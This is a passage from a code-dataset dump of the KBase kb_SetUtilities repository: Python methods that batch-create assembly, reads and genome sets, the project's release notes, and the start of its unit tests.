ass_seen.get(assRef):\n ass_seen[assRef] = True\n\n (assObj,\n info,\n ass_name,\n ass_type) = self.get_obj_data(assRef, 'assembly')\n\n if set_type != None:\n if ass_type != set_type:\n raise ValueError (\"Don't currently support heterogeneous AssemblySets. You have more than one type in your input\")\n set_type = ass_type\n\n # add assembly\n self.log(console,\"adding assembly \"+ass_name+\" : \"+assRef)\n items.append ({'ref': assRef,\n 'label': ass_name\n #'data_attachment': ,\n #'info'\n })\n\n\n # Store output object\n #\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING ASSEMBLY_SET\")\n output_assemblySet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_assemblySet_name = params['output_name']\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n # build output report object\n #\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) == 0:\n self.log(console,\"assembly objs in output set \"+params['output_name']+\": \"+str(len(params['input_refs'])))\n report += 'assembly objs in output set '+params['output_name']+': '+str(len(params['input_refs']))\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':'KButil_Build_AssemblySet'}],\n 'text_message':report\n }\n else:\n report += \"FAILURE:\\n\\n\"+\"\\n\".join(invalid_msgs)+\"\\n\"\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Build_AssemblySet DONE\")\n #END KButil_Build_AssemblySet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Build_AssemblySet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_ReadsSet(self, ctx, params):\n \"\"\"\n :param params: instance of type \"KButil_Batch_Create_ReadsSet_Params\"\n (KButil_Batch_Create_ReadsSet() ** ** Method for creating a\n ReadsSet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_ReadsSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_ReadsSet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_ReadsSet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n \n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created ReadsSet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for readslib objects\n ##\n pe_reads_obj_ref_by_name = dict()\n se_reads_obj_ref_by_name = dict()\n reads_obj_ref_by_name = None\n\n # Paired End\n pe_reads_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseFile.PairedEndLibrary',\n 'Paired-End Reads Library')\n for info in pe_reads_obj_info_list:\n reads_ref = self.get_obj_ref_from_obj_info(info)\n (reads_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' READS_NAME: '\"+reads_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(reads_name):\n self.log(console, \"ADDING \"+reads_name+\" (\"+reads_ref+\")\")\n pe_reads_obj_ref_by_name[reads_name] = reads_ref\n\n # Single End\n se_reads_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseFile.SingleEndLibrary',\n 'Single-End Reads Library')\n for info in se_reads_obj_info_list:\n reads_ref = self.get_obj_ref_from_obj_info(info)\n (reads_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' READS_NAME: '\"+reads_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(reads_name):\n self.log(console, \"ADDING \"+reads_name+\" (\"+reads_ref+\")\")\n se_reads_obj_ref_by_name[reads_name] = reads_ref\n\n # check for no hits\n if len(list(pe_reads_obj_ref_by_name.keys())) == 0 \\\n and len(list(se_reads_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Reads Library objects found\")\n else:\n self.log(invalid_msgs, \"No Reads Library objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n \n #### STEP 5: Build ReadsSet\n ##\n if len(invalid_msgs) == 0:\n items = []\n reads_ref_list = []\n\n # pick whether to use single end or paired end hits (favor paired end)\n if len(list(pe_reads_obj_ref_by_name.keys())) == 0 \\\n and len(list(se_reads_obj_ref_by_name.keys())) != 0:\n reads_obj_ref_by_name = se_reads_obj_ref_by_name\n else:\n reads_obj_ref_by_name = pe_reads_obj_ref_by_name\n\n # add readslibs\n for reads_name in sorted (reads_obj_ref_by_name.keys()):\n reads_ref = reads_obj_ref_by_name[reads_name]\n reads_ref_list.append (reads_ref)\n\n self.log(console,\"adding reads library \"+reads_name+\" : \"+reads_ref)\n items.append ({'ref': reads_ref,\n 'label': reads_name\n #'data_attachment': ,\n #'info'\n })\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING READS_SET\")\n\n # object def\n output_readsSet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_readsSet_name = params['output_name']\n # object save\n try:\n output_readsSet_ref = self.setAPI_Client.save_reads_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_readsSet_name,\n 'data': output_readsSet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save reads library set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"reads library objs in output set \"+params['output_name']+\": \"+str(len(items)))\n report += 'reads library objs in output set '+params['output_name']+': '+str(len(items))\n desc = 'KButil_Batch_Create_ReadsSet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_ReadsSet DONE\")\n #END KButil_Batch_Create_ReadsSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_ReadsSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_AssemblySet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Batch_Create_AssemblySet_Params\"\n (KButil_Batch_Create_AssemblySet() ** ** Method for creating an\n AssemblySet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_AssemblySet_Output\"\n -> structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_AssemblySet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_AssemblySet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n\n \n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created AssemblySet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for assembly objects\n ##\n assembly_obj_ref_by_name = dict()\n assembly_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseGenomeAnnotations.Assembly',\n 'Assembly')\n for info in assembly_obj_info_list:\n assembly_ref = self.get_obj_ref_from_obj_info(info)\n (assembly_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' ASSEMBLY_NAME: '\"+assembly_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(assembly_name):\n self.log(console, \"ADDING \"+assembly_name+\" (\"+assembly_ref+\")\")\n assembly_obj_ref_by_name[assembly_name] = assembly_ref\n\n if len(list(assembly_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Assembly objects found\")\n else:\n self.log(invalid_msgs, \"No Assembly objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n\n #### STEP 5: Build AssemblySet\n ##\n if len(invalid_msgs) == 0:\n items = []\n assembly_ref_list = []\n for ass_name in sorted (assembly_obj_ref_by_name.keys()):\n # add assembly\n ass_ref = assembly_obj_ref_by_name[ass_name]\n assembly_ref_list.append (ass_ref)\n\n self.log(console,\"adding assembly \"+ass_name+\" : \"+ass_ref)\n items.append ({'ref': ass_ref,\n 'label': ass_name\n #'data_attachment': ,\n #'info'\n })\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING ASSEMBLY_SET\")\n\n # object def\n output_assemblySet_obj = { 'description': params['desc'],\n 'items': items\n }\n output_assemblySet_name = params['output_name']\n # object save\n try:\n output_assemblySet_ref = self.setAPI_Client.save_assembly_set_v1 ({'workspace_name': params['workspace_name'],\n 'output_object_name': output_assemblySet_name,\n 'data': output_assemblySet_obj\n })['set_ref']\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save assembly set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"assembly objs in output set \"+params['output_name']+\": \"+str(len(items)))\n report += 'assembly objs in output set '+params['output_name']+': '+str(len(items))\n desc = 'KButil_Batch_Create_AssemblySet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_AssemblySet DONE\")\n #END KButil_Batch_Create_AssemblySet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_AssemblySet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n\n def KButil_Batch_Create_GenomeSet(self, ctx, params):\n \"\"\"\n :param params: instance of type\n \"KButil_Batch_Create_GenomeSet_Params\"\n (KButil_Batch_Create_GenomeSet() ** ** Method for creating a\n GenomeSet without specifying individual objects) -> structure:\n parameter \"workspace_name\" of type \"workspace_name\" (** The\n workspace object refs are of form: ** ** objects =\n ws.get_objects([{'ref':\n params['workspace_id']+'/'+params['obj_name']}]) ** ** \"ref\" means\n the entire name combining the workspace id and the object name **\n \"id\" is a numerical identifier of the workspace or object, and\n should just be used for workspace ** \"name\" is a string identifier\n of a workspace or object. This is received from Narrative.),\n parameter \"name_pattern\" of String, parameter \"output_name\" of\n type \"data_obj_name\", parameter \"desc\" of String\n :returns: instance of type \"KButil_Batch_Create_GenomeSet_Output\" ->\n structure: parameter \"report_name\" of type \"data_obj_name\",\n parameter \"report_ref\" of type \"data_obj_ref\"\n \"\"\"\n # ctx is the context object\n # return variables are: returnVal\n #BEGIN KButil_Batch_Create_GenomeSet\n\n #### STEP 0: standard method init\n ##\n [OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I, SIZE_I, META_I] = list(range(11)) # object_info tuple\n console = []\n invalid_msgs = []\n self.log(console,'Running KButil_Batch_Create_GenomeSet with params=')\n self.log(console, \"\\n\"+pformat(params))\n report = ''\n \n\n # check params\n required_params = ['workspace_name',\n 'output_name'\n ]\n self.check_params (params, required_params)\n if 'desc' not in params:\n params['desc'] = params['output_name']+' Batch Created GenomeSet'\n\n\n #### STEP 3: refine name_pattern\n ##\n name_pattern = params.get('name_pattern')\n if name_pattern:\n name_pattern = name_pattern.strip()\n name_pattern = name_pattern.strip('*')\n name_pattern = name_pattern.replace('.','\\.')\n name_pattern = name_pattern.replace('*','.*')\n\n regexp_name_pattern = re.compile ('^.*'+name_pattern+'.*$')\n\n\n #### STEP 4: read ws for genome objects\n ##\n genome_obj_ref_by_name = dict()\n genome_obj_info_list = self.get_obj_info_list_from_ws_name(params['workspace_name'],\n 'KBaseGenomes.Genome',\n 'Genome')\n for info in genome_obj_info_list:\n genome_ref = self.get_obj_ref_from_obj_info(info)\n (genome_name, type_name) = self.get_obj_name_and_type_from_obj_info (info)\n\n if name_pattern:\n self.log(console, \"NAME_PATTERN: '\"+name_pattern+\"' GENOME_NAME: '\"+genome_name+\"'\")\n\n if not name_pattern or regexp_name_pattern.match(genome_name):\n self.log(console, \"ADDING \"+genome_name+\" (\"+genome_ref+\")\")\n genome_obj_ref_by_name[genome_name] = genome_ref\n\n if len(list(genome_obj_ref_by_name.keys())) == 0:\n if not name_pattern:\n self.log(invalid_msgs, \"No Genome objects found\")\n else:\n self.log(invalid_msgs, \"No Genome objects passing name_pattern filter: '\"+name_pattern+\"'\")\n\n \n #### STEP 5: Build GenomeSet\n ##\n if len(invalid_msgs) == 0:\n #items = []\n elements = dict()\n genome_ref_list = []\n for gen_name in sorted (genome_obj_ref_by_name.keys()):\n # add genome\n gen_ref = genome_obj_ref_by_name[gen_name]\n genome_ref_list.append (gen_ref)\n\n self.log(console,\"adding genome \"+gen_name+\" : \"+gen_ref)\n #items.append ({'ref': gen_ref,\n # 'label': gen_name\n # #'data_attachment': ,\n # #'info'\n # })\n elements[gen_name] = dict()\n elements[gen_name]['ref'] = gen_ref\n\n\n #### STEP 6: Store output object\n ##\n if len(invalid_msgs) == 0:\n self.log(console,\"SAVING GENOME_SET\")\n\n # set provenance\n self.log(console, \"SETTING PROVENANCE\")\n input_ws_obj_refs = genome_ref_list\n provenance = self.set_provenance(ctx, input_ws_obj_refs, 'kb_SetUtilities', 'KButil_Batch_Create_GenomeSet')\n\n # object def\n output_genomeSet_obj = { 'description': params['desc'],\n #'items': items\n 'elements': elements\n }\n output_genomeSet_name = params['output_name']\n # object save\n try:\n new_obj_info = self.wsClient.save_objects({'workspace': params['workspace_name'],\n 'objects': [{'type': 'KBaseSearch.GenomeSet',\n 'data': output_genomeSet_obj,\n 'name': output_genomeSet_name,\n 'meta': {},\n 'provenance': provenance\n }]\n })[0]\n except Exception as e:\n raise ValueError('SetAPI FAILURE: Unable to save genome set object to workspace: (' + params['workspace_name']+\")\\n\" + str(e))\n\n\n #### STEP 7: build output report object\n ##\n self.log(console,\"SAVING REPORT\")\n if len(invalid_msgs) != 0:\n report += \"\\n\".join(invalid_msgs)\n reportObj = {\n 'objects_created':[],\n 'text_message':report\n }\n else:\n self.log(console,\"genome objs in output set \"+params['output_name']+\": \"+str(len(list(elements.keys()))))\n report += 'genome objs in output set '+params['output_name']+': '+str(len(list(elements.keys())))\n desc = 'KButil_Batch_Create_GenomeSet'\n if name_pattern:\n desc += ' with name_pattern: '+name_pattern\n reportObj = {\n 'objects_created':[{'ref':params['workspace_name']+'/'+params['output_name'], 'description':desc}],\n 'text_message':report\n }\n\n # Save report\n report_info = self.reportClient.create({'report':reportObj, 'workspace_name':params['workspace_name']})\n\n returnVal = { 'report_name': report_info['name'], 'report_ref': report_info['ref'] }\n self.log(console,\"KButil_Batch_Create_GenomeSet DONE\")\n #END KButil_Batch_Create_GenomeSet\n\n # At some point might do deeper type checking...\n if not isinstance(returnVal, dict):\n raise ValueError('Method KButil_Batch_Create_GenomeSet return value ' +\n 'returnVal is not type dict as required.')\n # return the results\n return [returnVal]\n def status(self, ctx):\n #BEGIN_STATUS\n returnVal = {'state': \"OK\", 'message': \"\", 'version': self.VERSION,\n 'git_url': self.GIT_URL, 'git_commit_hash': self.GIT_COMMIT_HASH}\n #END_STATUS\n return [returnVal]\n"
},
{
"alpha_fraction": 0.7132779955863953,
"alphanum_fraction": 0.7365145087242126,
"avg_line_length": 25.77777862548828,
"blob_id": "24a1b2cdaa6365d21d898a824bd2d0f2069d83d8",
"content_id": "276cb8a76de2976da11d0f4112a64ab19787ee37",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2410,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 90,
"path": "/RELEASE_NOTES.md",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "### Version 1.7.6\n__Changes__\n- fixed bugs found in narrative beta testing\n- added error when trying to build ReadsSet mixing PE and SE\n- removed redundant output cells from Set creation Apps\n- made set_provenance() method\n- updated to use KBaseReport.create()\n- followed recommended code tidying\n\n### Version 1.7.5\n__Changes__\n- added Github Actions unit testing\n- tidied up links to support in App Docs\n\n### Version 1.7.4\n__Changes__\n- added support for FeatureSets that may include Annotated Metagenome Assembly features to\n * KButil_Merge_FeatureSet_Collection\n- fixed bug in KButil_Merge_FeatureSet_Collection to avoid duplication\n- fixed bug in KButil_Logical_Slice_*() that was returning union for yesA_notB and notA_yesB\n- updated path to support URL\n\n### Version 1.7.3\n__Changes__\n- fixed bug in \"Merge GenomeSets\" caused by SpeciesTree GenomeSet elements having same ids\n\n### Version 1.7.2\n__Changes__\n- added GenomeSets and SpeciesTrees as option to be added in \"Add Genomes to GenomeSet\"\n\n### Version 1.7.1\n__Changes__\n- tweaked Venn Slice to fix bug in GenomeSet and improve icon\n\n### Version 1.7.0\n__Changes__\n- added support for FeatureSets that may include Annotated Metagenome Assembly features to\n * KButil_Slice_FeatureSets_by_Genomes\n * KButil_Build_GenomeSet_from_FeatureSet\n * KButil_Logical_Slice_Two_FeatureSets (aka \"Venn Slice\")\n\n### Version 1.6.0\n__Changes__\n- added \"Venn Slice Two AssemblySets\" App\n- added \"Venn Slice Two GenomeSets\" App\n\n### Version 1.5.0\n__Changes__\n- added KButil_Remove_Genomes_from_GenomeSet()\n- changed KButil_Add_Genomes_to_GenomeSet() to accept genome object list\n- Description input field no longer required in Apps\n\n### Version 1.4.0\n__Changes__\n- added KButil_Batch_Create_ReadsSet()\n\n### Version 1.3.0\n__Changes__\n- update to python3\n\n### Version 1.2.0\n__Changes__\n- added KButil_Batch_Create_GenomeSet()\n- added KButil_Batch_Create_AssemblySet()\n\n### Version 1.1.3\n__Changes__\n- added unit test data\n\n### Version 1.1.2\n__Changes__\n- added KBase paper citation in PLOS format \n\n### Version 1.1.1\n__Changes__\n- updated base docker image to sdkbase2\n- improved docs pages for Apps\n\n### Version 1.1.0\n__Changes__\n- added \"Slice FeatureSets by Genomes\" App\n- added \"Logical Slice Two FeatureSets\" App\n- added transformation diagrams to docs pages\n\n### Version 1.0.1\n__Changes__\n- changed contact from email to url\n\n### Version 1.0.0\n- Initial release\n"
},
{
"alpha_fraction": 0.48845264315605164,
"alphanum_fraction": 0.5171477794647217,
"avg_line_length": 43.20246887207031,
"blob_id": "d92da89f634187e63dabd5bbe792149b39d1338c",
"content_id": "7f9ce7e32e67c6ef4fb88565b1d8d32c35c3908c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 103920,
"license_type": "permissive",
"max_line_length": 132,
"num_lines": 2351,
"path": "/test/kb_SetUtilities_server_test.py",
"repo_name": "kbaseapps/kb_SetUtilities",
"src_encoding": "UTF-8",
"text": "import os\nimport shutil\nimport time\nimport unittest\nfrom configparser import ConfigParser # py3\nfrom os import environ\nfrom pprint import pprint\n\nimport requests\n\nfrom installed_clients.AssemblyUtilClient import AssemblyUtil\nfrom installed_clients.GenomeFileUtilClient import GenomeFileUtil\nfrom installed_clients.ReadsUtilsClient import ReadsUtils\nfrom installed_clients.WorkspaceClient import Workspace as workspaceService\nfrom installed_clients.SetAPIServiceClient import SetAPI\nfrom kb_SetUtilities.kb_SetUtilitiesImpl import kb_SetUtilities\n\n\n[OBJID_I, NAME_I, TYPE_I, SAVE_DATE_I, VERSION_I, SAVED_BY_I, WSID_I, WORKSPACE_I, CHSUM_I,\n SIZE_I, META_I] = list(range(11)) # object_info tuple\n\nclass kb_SetUtilitiesTest(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n token = environ.get('KB_AUTH_TOKEN', None)\n cls.token = token\n cls.ctx = {'token': token, 'provenance': [{'service': 'kb_SetUtilities',\n 'method': 'please_never_use_it_in_production',\n 'method_params': []}],\n 'authenticated': 1}\n config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)\n cls.cfg = {}\n config = ConfigParser()\n config.read(config_file)\n for nameval in config.items('kb_SetUtilities'):\n print(nameval[0] + '=' + nameval[1])\n cls.cfg[nameval[0]] = nameval[1]\n cls.wsURL = cls.cfg['workspace-url']\n cls.shockURL = cls.cfg['shock-url']\n cls.serviceWizardURL = cls.cfg['service-wizard-url']\n cls.callbackURL = os.environ['SDK_CALLBACK_URL']\n cls.wsClient = workspaceService(cls.wsURL, token=token)\n cls.serviceImpl = kb_SetUtilities(cls.cfg)\n cls.scratch = os.path.abspath(cls.cfg['scratch'])\n if not os.path.exists(cls.scratch):\n os.makedirs(cls.scratch)\n\n @classmethod\n def tearDownClass(cls):\n if hasattr(cls, 'wsName'):\n cls.wsClient.delete_workspace({'workspace': cls.wsName})\n print('Test workspace was deleted')\n if hasattr(cls, 'ws2Name'):\n cls.wsClient.delete_workspace({'workspace': cls.ws2Name})\n print('Test workspace2 was deleted')\n if hasattr(cls, 'shock_ids'):\n for shock_id in cls.shock_ids:\n print('Deleting SHOCK node: ' + str(shock_id))\n cls.delete_shock_node(shock_id)\n\n @classmethod\n def delete_shock_node(cls, node_id):\n header = {'Authorization': 'Oauth {0}'.format(cls.token)}\n requests.delete(cls.shockURL + '/node/' + node_id, headers=header,\n allow_redirects=True)\n print('Deleted shock node ' + node_id)\n\n def getWsClient(self):\n return self.__class__.wsClient\n\n def getWsName(self):\n if hasattr(self.__class__, 'wsName'):\n return self.__class__.wsName\n suffix = int(time.time() * 1000)\n wsName = \"test_kb_SetUtilities_\" + str(suffix)\n ret = self.getWsClient().create_workspace({'workspace': wsName})\n self.__class__.wsName = wsName\n return wsName\n\n def getWs2Name(self):\n if hasattr(self.__class__, 'ws2Name'):\n return self.__class__.ws2Name\n suffix = int(time.time() * 1000)\n ws2Name = \"test_kb_SetUtilities_\" + str(suffix)+'-2'\n ret = self.getWsClient().create_workspace({'workspace': ws2Name})\n self.__class__.ws2Name = ws2Name\n return ws2Name\n\n def getImpl(self):\n return self.__class__.serviceImpl\n\n def getContext(self):\n return self.__class__.ctx\n\n # call this method to get the WS object info of a Genome\n # (will upload the example data if this is the first time the method is called during tests)\n def getGenomeInfo(self, genome_basename, lib_i=0):\n if hasattr(self.__class__, 'genomeInfo_list'):\n try:\n info = self.__class__.genomeInfo_list[lib_i]\n name = self.__class__.genomeName_list[lib_i]\n if info != None:\n if name != genome_basename:\n self.__class__.genomeInfo_list[lib_i] = None\n self.__class__.genomeName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) transform genbank to kbase genome object and upload to ws\n shared_dir = \"/kb/module/work/tmp\"\n genome_data_file = 'data/genomes/' + genome_basename + '.gbff'\n genome_file = os.path.join(shared_dir, os.path.basename(genome_data_file))\n shutil.copy(genome_data_file, genome_file)\n\n SERVICE_VER = 'release'\n # SERVICE_VER = 'dev'\n GFU = GenomeFileUtil(os.environ['SDK_CALLBACK_URL'],\n token=self.__class__.token,\n service_ver=SERVICE_VER\n )\n print(\n \"UPLOADING genome: \" + genome_basename + \" to WORKSPACE \" + self.getWsName() + \" ...\")\n genome_upload_result = GFU.genbank_to_genome({'file': {'path': genome_file},\n 'workspace_name': self.getWsName(),\n 'genome_name': genome_basename\n })\n # })[0]\n pprint(genome_upload_result)\n genome_ref = genome_upload_result['genome_ref']\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': genome_ref}]})[0]\n\n # 2) store it\n if not hasattr(self.__class__, 'genomeInfo_list'):\n self.__class__.genomeInfo_list = []\n self.__class__.genomeName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.genomeInfo_list[i]\n except:\n self.__class__.genomeInfo_list.append(None)\n self.__class__.genomeName_list.append(None)\n\n self.__class__.genomeInfo_list[lib_i] = new_obj_info\n self.__class__.genomeName_list[lib_i] = genome_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Single End Library (will\n # upload the example data if this is the first time the method is called during tests)\n def getSingleEndLibInfo(self, read_lib_basename, lib_i=0):\n if hasattr(self.__class__, 'singleEndLibInfo_list'):\n try:\n info = self.__class__.singleEndLibInfo_list[lib_i]\n name = self.__class__.singleEndLibName_list[lib_i]\n if info != None:\n if name != read_lib_basename:\n self.__class__.singleEndLibInfo_list[lib_i] = None\n self.__class__.singleEndLibName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) upload files to shock\n shared_dir = \"/kb/module/work/tmp\"\n forward_data_file = 'data/' + read_lib_basename + '.fwd.fq'\n forward_file = os.path.join(shared_dir, os.path.basename(forward_data_file))\n shutil.copy(forward_data_file, forward_file)\n\n ru = ReadsUtils(os.environ['SDK_CALLBACK_URL'])\n single_end_ref = ru.upload_reads({'fwd_file': forward_file,\n 'sequencing_tech': 'artificial reads',\n 'wsname': self.getWsName(),\n 'name': 'test-' + str(lib_i) + '.se.reads'})['obj_ref']\n\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': single_end_ref}]})[0]\n\n # store it\n if not hasattr(self.__class__, 'singleEndLibInfo_list'):\n self.__class__.singleEndLibInfo_list = []\n self.__class__.singleEndLibName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.singleEndLibInfo_list[i]\n except:\n self.__class__.singleEndLibInfo_list.append(None)\n self.__class__.singleEndLibName_list.append(None)\n\n self.__class__.singleEndLibInfo_list[lib_i] = new_obj_info\n self.__class__.singleEndLibName_list[lib_i] = read_lib_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Paired End Library (will\n # upload the example data if this is the first time the method is called during tests)\n def getPairedEndLibInfo(self, read_lib_basename, lib_i=0):\n if hasattr(self.__class__, 'pairedEndLibInfo_list'):\n try:\n info = self.__class__.pairedEndLibInfo_list[lib_i]\n name = self.__class__.pairedEndLibName_list[lib_i]\n if info != None:\n if name != read_lib_basename:\n self.__class__.pairedEndLibInfo_list[lib_i] = None\n self.__class__.pairedEndLibName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) upload files to shock\n shared_dir = \"/kb/module/work/tmp\"\n forward_data_file = 'data/' + read_lib_basename + '.fwd.fq'\n forward_file = os.path.join(shared_dir, os.path.basename(forward_data_file))\n shutil.copy(forward_data_file, forward_file)\n reverse_data_file = 'data/' + read_lib_basename + '.rev.fq'\n reverse_file = os.path.join(shared_dir, os.path.basename(reverse_data_file))\n shutil.copy(reverse_data_file, reverse_file)\n\n ru = 